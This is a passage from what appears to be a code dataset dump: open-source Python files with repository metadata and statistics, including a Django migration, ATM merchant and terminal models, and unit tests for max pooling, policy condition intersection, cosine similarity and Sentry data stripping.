name='is_beneficiary',
field=models.BooleanField(blank=True, default=False, verbose_name='є бенефіціаром'),
),
migrations.AddField(
model_name='historicalfounder',
name='is_founder',
field=models.BooleanField(blank=True, default=False, verbose_name='є офіційним засновником'),
),
migrations.AlterField(
model_name='company',
name='code',
field=models.CharField(db_index=True, max_length=510),
),
migrations.AlterField(
model_name='company',
name='registration_date',
field=models.DateField(null=True, verbose_name='дата реєстрації'),
),
migrations.AlterField(
model_name='founder',
name='address',
field=models.CharField(blank=True, default='', max_length=2015, null=True, verbose_name='адреса'),
),
migrations.AlterField(
model_name='founder',
name='edrpou',
field=models.CharField(blank=True, db_index=True, default='', max_length=9, null=True, verbose_name='код ЄДРПОУ'),
),
migrations.AlterField(
model_name='founder',
name='equity',
field=models.FloatField(blank=True, null=True, verbose_name='участь в статутному капіталі'),
),
migrations.AlterField(
model_name='founder',
name='name',
field=models.TextField(db_index=True, verbose_name="назва/повне ім'я"),
),
migrations.AlterField(
model_name='historicalcompany',
name='code',
field=models.CharField(db_index=True, max_length=510),
),
migrations.AlterField(
model_name='historicalcompany',
name='registration_date',
field=models.DateField(null=True, verbose_name='дата реєстрації'),
),
migrations.AlterField(
model_name='historicalfounder',
name='address',
field=models.CharField(blank=True, default='', max_length=2015, null=True, verbose_name='адреса'),
),
migrations.AlterField(
model_name='historicalfounder',
name='edrpou',
field=models.CharField(blank=True, db_index=True, default='', max_length=9, null=True, verbose_name='код ЄДРПОУ'),
),
migrations.AlterField(
model_name='historicalfounder',
name='equity',
field=models.FloatField(blank=True, null=True, verbose_name='участь в статутному капіталі'),
),
migrations.AlterField(
model_name='historicalfounder',
name='name',
field=models.TextField(db_index=True, verbose_name="назва/повне ім'я"),
),
]
| 38.336538 | 126 | 0.591673 | 386 | 3,987 | 5.96114 | 0.209845 | 0.070404 | 0.078227 | 0.151239 | 0.901347 | 0.901347 | 0.817905 | 0.797045 | 0.797045 | 0.797045 | 0 | 0.018629 | 0.286431 | 3,987 | 103 | 127 | 38.708738 | 0.790158 | 0.011287 | 0 | 0.927835 | 1 | 0 | 0.162437 | 0.005838 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.010309 | 0 | 0.041237 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
99296707f747fc570de756993dd3bc5bb8592eee | 163 | py | Python | cpyquickhelper/parallel/__init__.py | sdpython/cpyquickhelper | c2bdebad2201c7e10a5999a836bbf53e27b963c7 | [
"MIT"
] | 2 | 2017-10-03T20:39:13.000Z | 2019-02-06T15:24:04.000Z | cpyquickhelper/parallel/__init__.py | sdpython/cpyquickhelper | c2bdebad2201c7e10a5999a836bbf53e27b963c7 | [
"MIT"
] | 21 | 2017-09-17T11:14:04.000Z | 2021-01-01T13:24:20.000Z | cpyquickhelper/parallel/__init__.py | sdpython/cpyquickhelper | c2bdebad2201c7e10a5999a836bbf53e27b963c7 | [
"MIT"
] | null | null | null | """
@file
@brief Shortcut to *parallel*.
"""
from .threader import kill_thread # pylint: disable=E0611
from .threadhelper import KThread # pylint: disable=E0611
| 23.285714 | 58 | 0.742331 | 20 | 163 | 6 | 0.75 | 0.216667 | 0.3 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057143 | 0.141104 | 163 | 6 | 59 | 27.166667 | 0.8 | 0.496933 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
994401a0b77312c76f306e31b445a31086f535d4 | 6,978 | py | Python | 01_mysteries_of_neural_networks/06_numpy_convolutional_neural_net/tests/layers/unit_tests/test_pooling.py | angliu-bu/ILearnDeepLearning.py | 12819d6c32735a2d7277097e712adb04bd766081 | [
"MIT"
] | 1,093 | 2018-09-07T07:15:29.000Z | 2022-03-09T16:40:42.000Z | 01_mysteries_of_neural_networks/06_numpy_convolutional_neural_net/tests/layers/unit_tests/test_pooling.py | angliu-bu/ILearnDeepLearning.py | 12819d6c32735a2d7277097e712adb04bd766081 | [
"MIT"
] | 30 | 2018-09-20T02:41:40.000Z | 2022-02-10T01:37:19.000Z | 01_mysteries_of_neural_networks/06_numpy_convolutional_neural_net/tests/layers/unit_tests/test_pooling.py | angliu-bu/ILearnDeepLearning.py | 12819d6c32735a2d7277097e712adb04bd766081 | [
"MIT"
] | 456 | 2018-09-09T19:14:16.000Z | 2022-03-18T16:34:53.000Z | import numpy as np
from src.layers.pooling import MaxPoolLayer
class TestMaxPoolLayer:
def test_forward_pass_single_channel_single_item(self):
# given
pool_size = (2, 2)
stride = 2
activation = np.array([[
[[1], [2], [2], [1]],
[[3], [4], [0], [0]],
[[5], [2], [1], [1]],
[[3], [4], [0], [3]]
]])
expected_result = np.array([[
[[4], [2]],
[[5], [3]],
]])
# when
layer = MaxPoolLayer(pool_size=pool_size, stride=stride)
result = layer.forward_pass(activation, training=True)
# then
assert result.shape == (1, 2, 2, 1)
assert np.alltrue(expected_result == result)
def test_forward_pass_two_channels_single_item(self):
# given
pool_size = (2, 2)
stride = 2
activation = np.array([[
[
[1, 5],
[2, 2],
[2, 2],
[1, 1]
],
[
[3, 3],
[4, 4],
[0, 3],
[0, 0]
],
[
[5, 2],
[2, 2],
[1, 1],
[1, 1]
],
[
[3, 3],
[4, 4],
[0, 2],
[3, 0]
]
]])
expected_result = np.array([[
[
[4, 5],
[2, 3]
],
[
[5, 4],
[3, 2]
]
]])
# when
layer = MaxPoolLayer(pool_size=pool_size, stride=stride)
result = layer.forward_pass(activation, training=True)
# then
assert result.shape == (1, 2, 2, 2)
assert np.alltrue(expected_result == result)
def test_forward_pass_single_channel_two_items(self):
# given
pool_size = (2, 2)
stride = 2
activation = np.array([
[
[[1], [2], [2], [1]],
[[3], [4], [0], [0]],
[[5], [2], [1], [1]],
[[3], [4], [0], [3]]
],
[
[[5], [2], [2], [1]],
[[3], [4], [3], [0]],
[[2], [2], [1], [1]],
[[3], [4], [2], [0]]
]
])
expected_result = np.array([
[
[[4], [2]],
[[5], [3]]
],
[
[[5], [3]],
[[4], [2]]
]
])
# when
layer = MaxPoolLayer(pool_size=pool_size, stride=stride)
result = layer.forward_pass(activation, training=True)
# then
assert result.shape == (2, 2, 2, 1)
assert np.alltrue(expected_result == result)
def test_backward_pass_single_channel_single_item(self):
# given
pool_size = (2, 2)
stride = 2
forward_activation = np.array([[
[[1], [2], [2], [1]],
[[3], [4], [0], [0]],
[[5], [2], [1], [1]],
[[3], [4], [0], [3]]
]])
backward_activation = np.array([[
[[3], [1]],
[[8], [2]],
]])
expected_backward_result = np.array([[
[[0], [0], [1], [0]],
[[0], [3], [0], [0]],
[[8], [0], [0], [0]],
[[0], [0], [0], [2]]
]])
# when
layer = MaxPoolLayer(pool_size=pool_size, stride=stride)
_ = layer.forward_pass(forward_activation, training=True)
backward_result = layer.backward_pass(backward_activation)
# then
assert np.alltrue(expected_backward_result == backward_result)
def test_backward_pass_two_channels_single_item(self):
# given
pool_size = (2, 2)
stride = 2
forward_activation = np.array([[
[
[1, 5],
[2, 2],
[2, 2],
[1, 1]
],
[
[3, 3],
[4, 4],
[0, 3],
[0, 0]
],
[
[5, 2],
[2, 2],
[1, 1],
[1, 1]
],
[
[3, 3],
[4, 4],
[0, 2],
[3, 0]
]
]])
backward_activation = np.array([[
[
[7, 2],
[4, 3]
],
[
[1, 5],
[2, 2]
]
]])
expected_backward_result = np.array([[
[
[0, 2],
[0, 0],
[4, 0],
[0, 0]
],
[
[0, 0],
[7, 0],
[0, 3],
[0, 0]
],
[
[1, 0],
[0, 0],
[0, 0],
[0, 0]
],
[
[0, 0],
[0, 5],
[0, 2],
[2, 0]
]
]])
# when
layer = MaxPoolLayer(pool_size=pool_size, stride=stride)
_ = layer.forward_pass(forward_activation, training=True)
backward_result = layer.backward_pass(backward_activation)
# then
assert np.alltrue(expected_backward_result == backward_result)
def test_backward_pass_single_channel_two_items(self):
# given
pool_size = (2, 2)
stride = 2
forward_activation = np.array([
[
[[1], [2], [2], [1]],
[[3], [4], [0], [0]],
[[5], [2], [1], [1]],
[[3], [4], [0], [3]]
],
[
[[5], [2], [2], [1]],
[[3], [4], [3], [0]],
[[2], [2], [1], [1]],
[[3], [4], [2], [0]]
]
])
backward_activation = np.array([
[
[[7], [2]],
[[4], [3]]
],
[
[[1], [5]],
[[2], [2]]
]
])
expected_backward_result = np.array([
[
[[0], [0], [2], [0]],
[[0], [7], [0], [0]],
[[4], [0], [0], [0]],
[[0], [0], [0], [3]]
],
[
[[1], [0], [0], [0]],
[[0], [0], [5], [0]],
[[0], [0], [0], [0]],
[[0], [2], [2], [0]]
]
])
# when
layer = MaxPoolLayer(pool_size=pool_size, stride=stride)
_ = layer.forward_pass(forward_activation, training=True)
backward_result = layer.backward_pass(backward_activation)
# then
assert np.alltrue(expected_backward_result == backward_result)
| 24.921429 | 70 | 0.323015 | 634 | 6,978 | 3.394322 | 0.074132 | 0.04368 | 0.036245 | 0.037175 | 0.945632 | 0.938662 | 0.920539 | 0.908457 | 0.862454 | 0.857807 | 0 | 0.090274 | 0.507882 | 6,978 | 279 | 71 | 25.010753 | 0.536401 | 0.013614 | 0 | 0.632035 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038961 | 1 | 0.025974 | false | 0.064935 | 0.008658 | 0 | 0.038961 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
99791889d91594ce4a588e8ff5ce2892d48ae229 | 5,389 | py | Python | tests/unit/intersection/test_effective_condition.py | etta-trust/PolicyGlass | 72157189a9af3172e6efbdcc2050969796cfa99f | [
"MIT"
] | 49 | 2021-12-21T23:15:55.000Z | 2022-03-28T09:38:30.000Z | tests/unit/intersection/test_effective_condition.py | etta-trust/PolicyGlass | 72157189a9af3172e6efbdcc2050969796cfa99f | [
"MIT"
] | 3 | 2021-12-23T22:02:02.000Z | 2022-01-10T14:16:24.000Z | tests/unit/intersection/test_effective_condition.py | etta-trust/PolicyGlass | 72157189a9af3172e6efbdcc2050969796cfa99f | [
"MIT"
] | 1 | 2022-02-22T11:03:27.000Z | 2022-02-22T11:03:27.000Z | import pytest
from policyglass import Action, Condition, EffectiveCondition
def test_bad_intersection():
with pytest.raises(ValueError) as ex:
EffectiveCondition(
frozenset({Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"])}), frozenset()
).intersection(Action("S3:*"))
assert "Cannot intersect EffectiveCondition with Action" in str(ex.value)
INTERSECTION_SCENARIOS = {
"proper_subset": {
"first": EffectiveCondition(
frozenset(
{
Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"]),
Condition(key="s3:x-amz-server-side-encryption", operator="StringNotEquals", values=["AES256"]),
}
),
frozenset(),
),
"second": EffectiveCondition(
frozenset({Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"])}), frozenset()
),
"result": EffectiveCondition(
frozenset({Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"])}), frozenset()
),
},
"proper_subset_with_exclusions": {
"first": EffectiveCondition(
frozenset(
{
Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"]),
Condition(key="s3:x-amz-server-side-encryption", operator="StringNotEquals", values=["AES256"]),
}
),
frozenset(),
),
"second": EffectiveCondition(
frozenset(
{
Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"]),
}
),
frozenset({Condition(key="key", operator="BinaryEquals", values=["QmluYXJ5VmFsdWVJbkJhc2U2NA=="])}),
),
"result": EffectiveCondition(
frozenset(
{
Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"]),
}
),
frozenset(),
),
},
# This is commented out until we deal with the fact that some conditions can negate each other, as the exclusions
# of first set won't negate second, but a condition in first that negates a condition in second will.
# "excluded_proper_subset": {
# "first": EffectiveCondition(
# frozenset(
# {
# Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"]),
# Condition(key="s3:x-amz-server-side-encryption", operator="StringNotEquals", values=["AES256"]),
# }
# ),
# frozenset({Condition(key="key", operator="BinaryEquals", values=["QmluYXJ5VmFsdWVJbkJhc2U2NA=="])}),
# ),
# "second": EffectiveCondition(
# frozenset({Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"])}), frozenset()
# ),
# "result": None,
# },
"subset": {
"first": EffectiveCondition(
frozenset({Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"])}), frozenset()
),
"second": EffectiveCondition(
frozenset({Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"])}), frozenset()
),
"result": EffectiveCondition(
frozenset({Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"])}), frozenset()
),
},
"disjoint": {
"first": EffectiveCondition(
frozenset({Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"])}), frozenset()
),
"second": EffectiveCondition(
frozenset(
{Condition(key="s3:x-amz-server-side-encryption", operator="StringNotEquals", values=["AES256"])}
),
frozenset(),
),
"result": EffectiveCondition(frozenset(), frozenset()),
},
"larger": {
"first": EffectiveCondition(
frozenset({Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"])}),
frozenset(),
),
"second": EffectiveCondition(
frozenset(
{
Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"]),
Condition(key="s3:x-amz-server-side-encryption", operator="StringNotEquals", values=["AES256"]),
}
),
frozenset(),
),
"result": EffectiveCondition(
frozenset({Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"])}),
frozenset(),
),
},
# "larger_with_exclusion": {
# "first": EffectiveCondition(Action("S3:Get*")),
# "second": EffectiveCondition(
# frozenset(
# {
# Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"]),
# Condition(key="s3:x-amz-server-side-encryption", operator="StringNotEquals", values=["AES256"]),
# }
# ),
# frozenset(),
# ),
# "result": EffectiveCondition(Action("S3:Get*"), frozenset({Action("S3:GetObject")})),
# },
}
@pytest.mark.parametrize("_, scenario", INTERSECTION_SCENARIOS.items())
def test_intersection(_, scenario):
first, second, result = scenario.values()
assert first.intersection(second) == result
| 38.769784 | 118 | 0.543515 | 387 | 5,389 | 7.529716 | 0.211886 | 0.123542 | 0.222375 | 0.227522 | 0.763555 | 0.763555 | 0.763555 | 0.763555 | 0.71757 | 0.688744 | 0 | 0.036218 | 0.30321 | 5,389 | 138 | 119 | 39.050725 | 0.739814 | 0.239562 | 0 | 0.64 | 0 | 0 | 0.254241 | 0.044505 | 0 | 0 | 0 | 0 | 0.02 | 1 | 0.02 | false | 0 | 0.02 | 0 | 0.04 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
41f2e92b3cc4382e966f2b904beae30eacad4050 | 505 | py | Python | modbus_client/gui/widgets/read_widgets/__init__.py | bronemos/Modbus_Client | 077ab1af76daaa76f4d428389baf2fc961f5af0b | [
"MIT"
] | null | null | null | modbus_client/gui/widgets/read_widgets/__init__.py | bronemos/Modbus_Client | 077ab1af76daaa76f4d428389baf2fc961f5af0b | [
"MIT"
] | null | null | null | modbus_client/gui/widgets/read_widgets/__init__.py | bronemos/Modbus_Client | 077ab1af76daaa76f4d428389baf2fc961f5af0b | [
"MIT"
] | null | null | null | from modbus_client.gui.widgets.read_widgets.read_coils_widget import ReadCoilsWidget
from modbus_client.gui.widgets.read_widgets.read_discrete_inputs_widget import ReadDiscreteInputsWidget
from modbus_client.gui.widgets.read_widgets.read_holding_registers_widget import ReadHoldingRegistersWidget
from modbus_client.gui.widgets.read_widgets.read_input_registers_widget import ReadInputRegistersWidget
from modbus_client.gui.widgets.read_widgets.read_input_registers_widget import ReadInputRegistersWidget
| 84.166667 | 107 | 0.920792 | 64 | 505 | 6.890625 | 0.28125 | 0.249433 | 0.181406 | 0.21542 | 0.69161 | 0.69161 | 0.69161 | 0.69161 | 0.412698 | 0.412698 | 0 | 0 | 0.039604 | 505 | 5 | 108 | 101 | 0.909278 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
5100965c0bc6aa401caee2f75179cc83cd4968f7 | 2,902 | py | Python | tests/test_cosine.py | giantoak/dedupe | 9ab392510ee36dc2275fb59bde22a591c38bb83b | [
"MIT"
] | null | null | null | tests/test_cosine.py | giantoak/dedupe | 9ab392510ee36dc2275fb59bde22a591c38bb83b | [
"MIT"
] | null | null | null | tests/test_cosine.py | giantoak/dedupe | 9ab392510ee36dc2275fb59bde22a591c38bb83b | [
"MIT"
] | null | null | null | import unittest
from dedupe.distance.cosine import CosineSetSimilarity, CosineTextSimilarity
import numpy
import pickle
class TestSetCosineClass(unittest.TestCase):
def setUp(self):
self.ilist = [('a', 'b', 'c'),
('b', 'c', 'd'),
('d', 'e', 'f')
]
def test_cosine(self):
cosine = CosineSetSimilarity(self.ilist)
s1 = self.ilist[0]
s2 = self.ilist[1]
cosine_sim = cosine(s1, s2)
self.assertAlmostEqual(cosine_sim, 0.378, places=3)
cosine_sim = cosine(('g', 'h', 'd', 'd'), s2)
self.assertAlmostEqual(cosine_sim, 0.267, places=3)
def test_cosine_na(self):
cosine = CosineSetSimilarity(self.ilist)
cosine_sim = cosine(self.ilist[0], ())
assert numpy.isnan(cosine_sim)
def test_cosine_identical(self):
cosine = CosineSetSimilarity(self.ilist)
cosine_sim = cosine(self.ilist[0], self.ilist[0])
self.assertAlmostEqual(cosine_sim, 1, places=5)
def test_cosine_cache(self):
cosine = CosineSetSimilarity(self.ilist)
s1 = self.ilist[0]
s2 = self.ilist[1]
cosine_sim = cosine(s1, s2)
self.assertAlmostEqual(cosine_sim, 0.378, places=3)
cosine_sim = cosine(s1, s2)
self.assertAlmostEqual(cosine_sim, 0.378, places=3)
def test_cosine_no_corpus(self):
cosine = CosineSetSimilarity([])
s1 = self.ilist[0]
s2 = self.ilist[1]
cosine_sim = cosine(s1, s2)
self.assertAlmostEqual(cosine_sim, 0.667, places=3)
cosine_sim = cosine(('g', 'h', 'd'), s2)
self.assertAlmostEqual(cosine_sim, 0.333, places=3)
def test_cosine_pickle(self) :
cosine = CosineSetSimilarity(self.ilist)
s1 = self.ilist[0]
s2 = self.ilist[1]
cosine_sim = cosine(s1, s2)
pickle.dumps(cosine)
cosine = CosineSetSimilarity([])
s1 = self.ilist[0]
s2 = self.ilist[1]
cosine_sim = cosine(s1, s2)
pickle.dumps(cosine)
class TestTextCosineClass(unittest.TestCase):
def setUp(self):
self.ilist = ['a b c',
'b c d',
'd e f']
def test_cosine(self):
cosine = CosineTextSimilarity(self.ilist)
s1 = self.ilist[0]
s2 = self.ilist[1]
cosine_sim = cosine(s1, s2)
self.assertAlmostEqual(cosine_sim, 0.378, places=3)
def test_cosine_na(self):
cosine = CosineTextSimilarity(self.ilist)
cosine_sim = cosine(self.ilist[0], '')
assert numpy.isnan(cosine_sim)
def test_cosine_identical(self):
cosine = CosineTextSimilarity(self.ilist)
cosine_sim = cosine(self.ilist[0], self.ilist[0])
self.assertAlmostEqual(cosine_sim, 1, places=5)
if __name__ == '__main__':
unittest.main()
| 32.606742 | 76 | 0.592695 | 348 | 2,902 | 4.801724 | 0.146552 | 0.150808 | 0.116697 | 0.16158 | 0.868342 | 0.844405 | 0.844405 | 0.804309 | 0.77319 | 0.77319 | 0 | 0.040865 | 0.283253 | 2,902 | 88 | 77 | 32.977273 | 0.7625 | 0 | 0 | 0.662162 | 0 | 0 | 0.013439 | 0 | 0 | 0 | 0 | 0 | 0.148649 | 1 | 0.148649 | false | 0 | 0.054054 | 0 | 0.22973 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
517a4f88be2cb85f0585fc7d2ff2eebe916d794c | 6,923 | py | Python | myapi/models.py | akhm7/atm-managment-system | 50639ac8bc2a7e21aa3828c3bae2fb2e6b0bd6bf | [
"Apache-2.0"
] | null | null | null | myapi/models.py | akhm7/atm-managment-system | 50639ac8bc2a7e21aa3828c3bae2fb2e6b0bd6bf | [
"Apache-2.0"
] | null | null | null | myapi/models.py | akhm7/atm-managment-system | 50639ac8bc2a7e21aa3828c3bae2fb2e6b0bd6bf | [
"Apache-2.0"
] | null | null | null | from django.db import models
from datetime import datetime, timezone
import json
class RequestData(models.Model):
createdAt = models.DateTimeField("Создан", auto_now_add = True)
method = models.TextField("Метод", blank = True, null = True)
scheme = models.TextField("Схема", blank = True, null = True)
headers = models.TextField("Заголовок", blank = True, null = True)
request = models.TextField("Запрос", blank = True, null = True)
endpoint = models.CharField("API", max_length=255, blank = True, null = True)
class Meta:
verbose_name = "Запросы"
verbose_name_plural = "Запросы"
def __str__(self):
temp = json.loads(self.request)
value = "None"
if 'data' in temp:
if 'MERCHANT' in temp["data"][0]:
value = temp["data"][0]["MERCHANT"]
elif 'TERMINAL_ID' in temp["data"][0]:
value = temp["data"][0]["TERMINAL_ID"]
else:
value = "None"
return value
class RegtseData(models.Model):
MERCHANT = models.CharField("MERCHANT", max_length=255, blank = False, null = False)
PARENT = models.CharField("PARENT", max_length=255, blank = True, null = True)
ABRV_NAME = models.CharField("ABRV_NAME", max_length=255, blank = True, null = True)
FULL_NAME = models.CharField("FULL_NAME", max_length=255, blank = True, null = True)
CNTRY = models.CharField("CNTRY", max_length=255, blank = True, null = True)
CITY = models.CharField("CITY", max_length=255, blank = True, null = True)
STREET = models.CharField("STREET", max_length=255, blank = True, null = True)
REG_NR = models.CharField("REG_NR", max_length=255, blank = True, null = True)
PHONE = models.CharField("PHONE", max_length=255, blank = True, null = True)
MCC = models.CharField("MCC", max_length=255, blank = True, null = True)
POST_IND = models.CharField("POST_IND", max_length=255, blank = True, null = True)
MRC_PHONE = models.CharField("MRC_PHONE", max_length=255, blank = True, null = True)
req = models.TextField("req", blank = True, null = True)
status = models.BooleanField("STATUS",default=False)
dt = models.DateTimeField("dt", default=datetime.now())
class Meta:
verbose_name = "Мерчанты"
verbose_name_plural = "Мерчанты"
def __str__(self):
return self.MERCHANT
class RegdevData(models.Model):
TERMINAL_ID = models.CharField("Terminal Id", max_length=255, blank = False, null = False)
ACCEPTOR_ID = models.CharField("Acceptor Id", max_length=255, blank = False, null = False)
TERM_TYPE = models.CharField("Type", max_length=255, blank = True, null = True)
POINT_CODE = models.CharField("Point Code", max_length=255, blank = True, null = True)
SERIAL_NR = models.CharField("Serial Number", max_length=255, blank = True, null = True)
INV_NR = models.CharField("Inventory Number", max_length=255, blank = True, null = True)
CURRENCY = models.CharField("Currency", max_length=255, blank = True, null = True)
regtseId = models.ForeignKey(related_name='regtseId', to=RegtseData, on_delete=models.CASCADE)
req = models.TextField("req", blank = True, null = True)
status = models.BooleanField("STATUS", default=False)
dt = models.DateTimeField("dt", default=datetime.now())
class Meta:
verbose_name = "Устройства"
verbose_name_plural = "Устройства"
def __str__(self):
return self.TERMINAL_ID
class RequestDataTest(models.Model):
createdAt = models.DateTimeField("Создан", auto_now_add = True)
method = models.TextField("Метод", blank = True, null = True)
scheme = models.TextField("Схема", blank = True, null = True)
headers = models.TextField("Заголовок", blank = True, null = True)
request = models.TextField("Запрос", blank = True, null = True)
endpoint = models.CharField("API", max_length=255, blank = True, null = True)
class Meta:
verbose_name = "Запросы (test)"
verbose_name_plural = "Запросы (test)"
def __str__(self):
temp = json.loads(self.request)
value = "None"
if 'data' in temp:
if 'MERCHANT' in temp["data"][0]:
value = temp["data"][0]["MERCHANT"]
elif 'TERMINAL_ID' in temp["data"][0]:
value = temp["data"][0]["TERMINAL_ID"]
else:
value = "None"
return value
class RegtseDataTest(models.Model):
MERCHANT = models.CharField("MERCHANT", max_length=255, null = False)
PARENT = models.CharField("PARENT", max_length=255, null = False)
ABRV_NAME = models.CharField("ABRV_NAME", max_length=255, blank = True, null = True)
FULL_NAME = models.CharField("FULL_NAME", max_length=255, blank = True, null = True)
CNTRY = models.CharField("CNTRY", max_length=255, blank = True, null = True)
CITY = models.CharField("CITY", max_length=255, blank = True, null = True)
STREET = models.CharField("STREET", max_length=255, blank = True, null = True)
REG_NR = models.CharField("REG_NR", max_length=255, blank = True, null = True)
PHONE = models.CharField("PHONE", max_length=255, blank = True, null = True)
MCC = models.CharField("MCC", max_length=255, blank = True, null = True)
POST_IND = models.CharField("POST_IND", max_length=255, blank = True, null = True)
MRC_PHONE = models.CharField("MRC_PHONE", max_length=255, blank = True, null = True)
req = models.TextField("req", blank = True, null = True)
status = models.BooleanField("STATUS",default=False)
dt = models.DateTimeField("dt", default=datetime.now())
class Meta:
verbose_name = "Мерчанты (test)"
verbose_name_plural = "Мерчанты (test)"
def __str__(self):
return self.MERCHANT
class RegdevDataTest(models.Model):
TERMINAL_ID = models.CharField("Terminal Id", max_length=255, blank = False, null = False)
ACCEPTOR_ID = models.CharField("Acceptor Id", max_length=255, blank = False, null = False)
TERM_TYPE = models.CharField("Type", max_length=255, blank = True, null = True)
POINT_CODE = models.CharField("Point Code", max_length=255, blank = True, null = True)
SERIAL_NR = models.CharField("Serial Number", max_length=255, blank = True, null = True)
INV_NR = models.CharField("Inventory Number", max_length=255, blank = True, null = True)
CURRENCY = models.CharField("Currency", max_length=255, blank = True, null = True)
regtseId = models.ForeignKey(related_name='regtseId', to=RegtseDataTest, on_delete=models.CASCADE)
req = models.TextField("req", blank = True, null = True)
status = models.BooleanField("STATUS", default=False)
dt = models.DateTimeField("dt", default=datetime.now())
class Meta:
verbose_name = "Устройства (test)"
verbose_name_plural = "Устройства (test)"
def __str__(self):
return self.TERMINAL_ID | 48.076389 | 102 | 0.662141 | 874 | 6,923 | 5.098398 | 0.115561 | 0.090889 | 0.131284 | 0.171679 | 0.922801 | 0.920781 | 0.918986 | 0.88465 | 0.88465 | 0.838869 | 0 | 0.023239 | 0.204391 | 6,923 | 144 | 103 | 48.076389 | 0.785766 | 0 | 0 | 0.77686 | 0 | 0 | 0.101675 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.049587 | false | 0 | 0.024793 | 0.033058 | 0.752066 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
51bbdff774c8762a8d2bcec1375d9bddd776fc8f | 1,172 | py | Python | tests/test_sentry_helper.py | jqueguiner/ai-django-core | 25a1ab4c8fff6a3183d3346d5eb7a8636014c48a | [
"MIT"
] | null | null | null | tests/test_sentry_helper.py | jqueguiner/ai-django-core | 25a1ab4c8fff6a3183d3346d5eb7a8636014c48a | [
"MIT"
] | null | null | null | tests/test_sentry_helper.py | jqueguiner/ai-django-core | 25a1ab4c8fff6a3183d3346d5eb7a8636014c48a | [
"MIT"
] | null | null | null | from django.test import TestCase
from ai_django_core.sentry.helpers import strip_sensitive_data_from_sentry_event
class SentryHelperTest(TestCase):
def test_strip_sensitive_data_from_sentry_event_regular(self):
event = {'user': {'email': 'mymail@example.com', 'ip_address': '127.0.0.1', 'username': 'my-user'}}
self.assertIsInstance(strip_sensitive_data_from_sentry_event(event, None), dict)
def test_strip_sensitive_data_from_sentry_event_missing_key_email(self):
event = {'user': {'ip_address': '127.0.0.1', 'username': 'my-user'}}
self.assertIsInstance(strip_sensitive_data_from_sentry_event(event, None), dict)
def test_strip_sensitive_data_from_sentry_event_missing_key_ip_address(self):
event = {'user': {'email': 'mymail@example.com', 'username': 'my-user'}}
self.assertIsInstance(strip_sensitive_data_from_sentry_event(event, None), dict)
def test_strip_sensitive_data_from_sentry_event_missing_key_username(self):
event = {'user': {'email': 'mymail@example.com', 'ip_address': '127.0.0.1'}}
self.assertIsInstance(strip_sensitive_data_from_sentry_event(event, None), dict)
